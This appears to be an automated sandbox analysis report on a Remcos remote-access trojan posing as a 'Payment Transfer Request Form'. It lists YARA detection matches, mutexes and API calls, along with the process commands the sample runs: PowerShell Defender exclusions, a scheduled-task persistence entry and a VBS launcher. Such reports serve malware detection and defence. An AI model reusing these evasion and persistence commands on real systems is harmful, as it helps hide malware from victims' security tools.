              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 24_2_074C726824_2_074C7268
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 24_2_074C52B824_2_074C52B8
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 24_2_074C4E8024_2_074C4E80
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 24_2_074C5B2824_2_074C5B28
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 24_2_074C5B2724_2_074C5B27
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 29_2_02D3D51C29_2_02D3D51C
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 29_2_0721BDA829_2_0721BDA8
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 29_2_07214E8029_2_07214E80
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 29_2_072156F029_2_072156F0
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 29_2_072104C829_2_072104C8
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 29_2_07215B2829_2_07215B28
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 29_2_07215B1929_2_07215B19
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 29_2_0721726829_2_07217268
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 29_2_072152B829_2_072152B8
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 33_2_0132D51C33_2_0132D51C
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 33_2_03006BE033_2_03006BE0
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 33_2_0300000733_2_03000007
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 33_2_0300004033_2_03000040
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 33_2_03006BD833_2_03006BD8
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 33_2_074EBD5B33_2_074EBD5B
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 33_2_074E56F033_2_074E56F0
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 33_2_074E4E8033_2_074E4E80
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 33_2_074E5B1933_2_074E5B19
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 33_2_074E5B2833_2_074E5B28
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 33_2_074E726833_2_074E7268
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 33_2_074E52B833_2_074E52B8
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: String function: 00402073 appears 51 times
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: String function: 00432B90 appears 53 times
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: String function: 00432525 appears 41 times
              Source: Payment Transfer Request Form.bat.exeStatic PE information: invalid certificate
              Source: Payment Transfer Request Form.bat.exe, 00000000.00000002.1429283409.0000000006E30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Payment Transfer Request Form.bat.exe
              Source: Payment Transfer Request Form.bat.exe, 00000000.00000000.1322690850.00000000001B2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameseEd.exe4 vs Payment Transfer Request Form.bat.exe
              Source: Payment Transfer Request Form.bat.exe, 00000000.00000002.1413438857.000000000072E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Payment Transfer Request Form.bat.exe
              Source: Payment Transfer Request Form.bat.exe, 00000000.00000002.1429762645.0000000007537000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameseEd.exe4 vs Payment Transfer Request Form.bat.exe
              Source: Payment Transfer Request Form.bat.exe, 00000000.00000002.1428203129.0000000004F80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Payment Transfer Request Form.bat.exe
              Source: Payment Transfer Request Form.bat.exe, 00000000.00000002.1417981546.00000000038FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Payment Transfer Request Form.bat.exe
              Source: Payment Transfer Request Form.bat.exe, 00000009.00000002.1407344012.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs Payment Transfer Request Form.bat.exe
              Source: Payment Transfer Request Form.bat.exe, 00000009.00000002.1407344012.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs Payment Transfer Request Form.bat.exe
              Source: Payment Transfer Request Form.bat.exeBinary or memory string: OriginalFilenameseEd.exe4 vs Payment Transfer Request Form.bat.exe
              Source: Payment Transfer Request Form.bat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 00000000.00000002.1417981546.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: Payment Transfer Request Form.bat.exe PID: 4072, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: Payment Transfer Request Form.bat.exe PID: 7380, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Payment Transfer Request Form.bat.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: iKgKaogJ.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: remcos.exe.9.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, QwhKlmmQbOGs1vhvh6.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, QwhKlmmQbOGs1vhvh6.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, yCV0BKZVRAKIRjaruc.cs | Security API names: _0020.SetAccessControl
Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, yCV0BKZVRAKIRjaruc.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, yCV0BKZVRAKIRjaruc.cs | Security API names: _0020.AddAccessRule
Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, yCV0BKZVRAKIRjaruc.cs | Security API names: _0020.SetAccessControl
Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, yCV0BKZVRAKIRjaruc.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, yCV0BKZVRAKIRjaruc.cs | Security API names: _0020.AddAccessRule
Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@49/31@2/2
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: 9_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,9_2_00415C90
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: 9_2_0040E2E7 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,9_2_0040E2E7
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: 9_2_00419493 FindResourceA,LoadResource,LockResource,SizeofResource,9_2_00419493
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: 9_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,9_2_00418A00
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | File created: C:\Users\user\AppData\Roaming\iKgKaogJ.exe
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5664:120:WilError_03
Source: C:\ProgramData\AppUpdate\remcos.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7268:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7176:120:WilError_03
Source: C:\ProgramData\AppUpdate\remcos.exe | Mutant created: \Sessions\1\BaseNamedObjects\pTaQptBbLSFkRXHSYlA
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7180:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7656:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7936:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2320:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7864:120:WilError_03
Source: C:\ProgramData\AppUpdate\remcos.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-VCJ8ZS
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7468:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7892:120:WilError_03
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | File created: C:\Users\user\AppData\Local\Temp\tmp854C.tmp
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"
Source: Payment Transfer Request Form.bat.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Payment Transfer Request Form.bat.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Payment Transfer Request Form.bat.exe, 00000000.00000000.1322690850.00000000001B2000.00000002.00000001.01000000.00000003.sdmp, remcos.exe.9.dr, iKgKaogJ.exe.0.dr | Binary or memory string: INSERT INTO [dbo].[CREDIT_PLAN] ([CREDIT_ID], [MATURITY_DATE], [MATURITY_SUM], [MATURITY_NOTE], [MODIF_DATE]) VALUES (@CREDIT_ID, @MATURITY_DATE, @MATURITY_SUM, @MATURITY_NOTE, @MODIF_DATE);
Source: Payment Transfer Request Form.bat.exe, 00000000.00000000.1322690850.00000000001B2000.00000002.00000001.01000000.00000003.sdmp, remcos.exe.9.dr, iKgKaogJ.exe.0.dr | Binary or memory string: INSERT INTO [dbo].[CREDIT_PRODUCT] ([PROD_NAME], [PROD_ACTIVE], [PROD_SUM_FROM], [PROD_SUM_TO], [MODIF_DATE], [INTEREST]) VALUES (@PROD_NAME, @PROD_ACTIVE, @PROD_SUM_FROM, @PROD_SUM_TO, @MODIF_DATE, @INTEREST);
Source: Payment Transfer Request Form.bat.exe, 00000000.00000000.1322690850.00000000001B2000.00000002.00000001.01000000.00000003.sdmp, remcos.exe.9.dr, iKgKaogJ.exe.0.dr | Binary or memory string: UPDATE [dbo].[Login] SET [User_id] = @User_id, [User_pass] = @User_pass WHERE (([User_id] = @Original_User_id) AND ([User_pass] = @Original_User_pass));
Source: Payment Transfer Request Form.bat.exe, 00000000.00000000.1322690850.00000000001B2000.00000002.00000001.01000000.00000003.sdmp, remcos.exe.9.dr, iKgKaogJ.exe.0.dr | Binary or memory string: UPDATE [dbo].[CREDIT_PLAN] SET [CREDIT_ID] = @CREDIT_ID, [MATURITY_DATE] = @MATURITY_DATE, [MATURITY_SUM] = @MATURITY_SUM, [MATURITY_NOTE] = @MATURITY_NOTE, [MODIF_DATE] = @MODIF_DATE WHERE (([MATURITY_ID] = @Original_MATURITY_ID) AND ((@IsNull_CREDIT_ID = 1 AND [CREDIT_ID] IS NULL) OR ([CREDIT_ID] = @Original_CREDIT_ID)) AND ([MATURITY_DATE] = @Original_MATURITY_DATE) AND ([MATURITY_SUM] = @Original_MATURITY_SUM) AND ((@IsNull_MATURITY_NOTE = 1 AND [MATURITY_NOTE] IS NULL) OR ([MATURITY_NOTE] = @Original_MATURITY_NOTE)) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
Source: Payment Transfer Request Form.bat.exe, 00000000.00000000.1322690850.00000000001B2000.00000002.00000001.01000000.00000003.sdmp, remcos.exe.9.dr, iKgKaogJ.exe.0.dr | Binary or memory string: INSERT INTO [dbo].[PROD_PERIODS] ([PROD_CODE], [PROD_PERIOD]) VALUES (@PROD_CODE, @PROD_PERIOD);
Source: Payment Transfer Request Form.bat.exe, 00000000.00000000.1322690850.00000000001B2000.00000002.00000001.01000000.00000003.sdmp, remcos.exe.9.dr, iKgKaogJ.exe.0.dr | Binary or memory string: UPDATE [dbo].[INTEREST] SET [PROD_CODE] = @PROD_CODE, [PROD_PERIOD] = @PROD_PERIOD, [SUM_FROM] = @SUM_FROM, [SUM_TO] = @SUM_TO WHERE (([PROD_CODE] = @Original_PROD_CODE) AND ([PROD_PERIOD] = @Original_PROD_PERIOD) AND ([SUM_FROM] = @Original_SUM_FROM) AND ([SUM_TO] = @Original_SUM_TO));
Source: Payment Transfer Request Form.bat.exe, 00000000.00000000.1322690850.00000000001B2000.00000002.00000001.01000000.00000003.sdmp, remcos.exe.9.dr, iKgKaogJ.exe.0.dr | Binary or memory string: UPDATE [dbo].[CREDIT] SET [CREDIT_NO] = @CREDIT_NO, [CREDIT_DATE] = @CREDIT_DATE, [CREDIT_PERIOD] = @CREDIT_PERIOD, [CREDIT_END_DATE] = @CREDIT_END_DATE, [CREDIT_BEGIN_DATE] = @CREDIT_BEGIN_DATE, [CLIENT_ID] = @CLIENT_ID, [PROD_CODE] = @PROD_CODE, [CREDIT_SUM] = @CREDIT_SUM, [CREDIT_NOTE] = @CREDIT_NOTE, [MODIF_DATE] = @MODIF_DATE WHERE (([CREDIT_ID] = @Original_CREDIT_ID) AND ([CREDIT_NO] = @Original_CREDIT_NO) AND ((@IsNull_CREDIT_DATE = 1 AND [CREDIT_DATE] IS NULL) OR ([CREDIT_DATE] = @Original_CREDIT_DATE)) AND ([CREDIT_PERIOD] = @Original_CREDIT_PERIOD) AND ((@IsNull_CREDIT_END_DATE = 1 AND [CREDIT_END_DATE] IS NULL) OR ([CREDIT_END_DATE] = @Original_CREDIT_END_DATE)) AND ((@IsNull_CREDIT_BEGIN_DATE = 1 AND [CREDIT_BEGIN_DATE] IS NULL) OR ([CREDIT_BEGIN_DATE] = @Original_CREDIT_BEGIN_DATE)) AND ([CLIENT_ID] = @Original_CLIENT_ID) AND ((@IsNull_PROD_CODE = 1 AND [PROD_CODE] IS NULL) OR ([PROD_CODE] = @Original_PROD_CODE)) AND ([CREDIT_SUM] = @Original_CREDIT_SUM) AND ((@IsNull_CREDIT_NOTE = 1 AND [CREDIT_NOTE] IS NULL) OR ([CREDIT_NOTE] = @Original_CREDIT_NOTE)) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
Source: Payment Transfer Request Form.bat.exe, 00000000.00000000.1322690850.00000000001B2000.00000002.00000001.01000000.00000003.sdmp, remcos.exe.9.dr, iKgKaogJ.exe.0.dr | Binary or memory string: UPDATE [dbo].[CREDIT_PRODUCT] SET [PROD_NAME] = @PROD_NAME, [PROD_ACTIVE] = @PROD_ACTIVE, [PROD_SUM_FROM] = @PROD_SUM_FROM, [PROD_SUM_TO] = @PROD_SUM_TO, [MODIF_DATE] = @MODIF_DATE WHERE (([PROD_CODE] = @Original_PROD_CODE) AND ([PROD_NAME] = @Original_PROD_NAME) AND ([PROD_ACTIVE] = @Original_PROD_ACTIVE) AND ([PROD_SUM_FROM] = @Original_PROD_SUM_FROM) AND ([PROD_SUM_TO] = @Original_PROD_SUM_TO) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
Source: Payment Transfer Request Form.bat.exe, 00000000.00000000.1322690850.00000000001B2000.00000002.00000001.01000000.00000003.sdmp, remcos.exe.9.dr, iKgKaogJ.exe.0.dr | Binary or memory string: INSERT INTO [dbo].[CREDIT_PRODUCT] ([PROD_NAME], [PROD_ACTIVE], [PROD_SUM_FROM], [PROD_SUM_TO], [MODIF_DATE]) VALUES (@PROD_NAME, @PROD_ACTIVE, @PROD_SUM_FROM, @PROD_SUM_TO, @MODIF_DATE);
Source: Payment Transfer Request Form.bat.exe | ReversingLabs: Detection: 52%
Source: Payment Transfer Request Form.bat.exe | Virustotal: Detection: 61%
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | File read: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe
Source: unknown | Process created: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe"
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iKgKaogJ.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmp854C.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Process created: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe"
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\iKgKaogJ.exe C:\Users\user\AppData\Roaming\iKgKaogJ.exe
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\ProgramData\AppUpdate\remcos.exe"
